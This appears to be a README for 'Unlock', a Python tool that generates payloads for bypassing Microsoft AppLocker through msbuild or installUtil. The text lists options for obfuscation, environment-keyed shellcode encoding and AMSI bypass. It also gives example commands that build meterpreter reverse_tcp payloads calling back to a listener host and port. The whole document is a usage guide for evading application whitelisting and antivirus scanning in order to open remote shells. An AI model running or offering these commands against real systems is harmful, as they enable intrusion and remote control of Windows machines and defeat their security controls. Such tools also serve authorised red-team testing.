Unlock applocker
Microsoft Applocker evasion tool
Unlock aims to be an easy tool for generating payloads which can bypass MS applocker restriction. The code is heavily based on subtee work.
Link: https://github.com/freshness79/unlock/blob/master/README.md
Usage
unlock.py [-h] [--output FILENAME] [--framework FWV] [--payload PAYLOAD] [--lhost LHOST] [--lport LPORT] [--method METHOD] [--enaobf] [--encshell ENCSHELL] [--custom CUSTOM] [--x64] [--noamsi]
Arguments:
--output FILENAME Output file name without extension --framework FWV Framework NET version --payload PAYLOAD Payload in MSF syntax --lhost LHOST Local host for reverse shell --lport LPORT Local port for reverse shell --method METHOD Evasion method: msbuild or installUtil --enaobf Enable CS code obfuscation --encshell ENCSHELL Encode shell with: yyyymmdd, yyyymm, hostname, or domain --enctext TEXT Text to xorencode payload with, used with hostname or domain --custom CUSTOM Custom binary payload (don't use with --payload/--lhost/--lport) --x64 Set if your custom payload is x64 --noamsi Add code to bypass AMSI
Notes
everything but msbuild on framework 4.0 is untested
Examples
python unlock.py --framework 4.0 --payload windows/x64/meterpreter/reverse_tcp --lhost 192.168.0.1 --lport 4444 --method installUtil
python unlock.py --framework 4.0 --payload windows/meterpreter/reverse_tcp --lhost 192.168.0.1 --lport 4444 --method msbuild
python unlock.py --framework 4.0 --custom shellcode.bin --x64
python unlock.py --framework 4.0 --custom shellcode.bin --x64 --encshell yyyymm --noamsi
python unlock.py --framework 4.0 --custom shellcode.bin --x64 --encshell hostname --enctext SECRETARY
python unlock.py --framework 4.0 --custom shellcode.bin --x64 --encshell domain --enctext CONTOSO
Last updated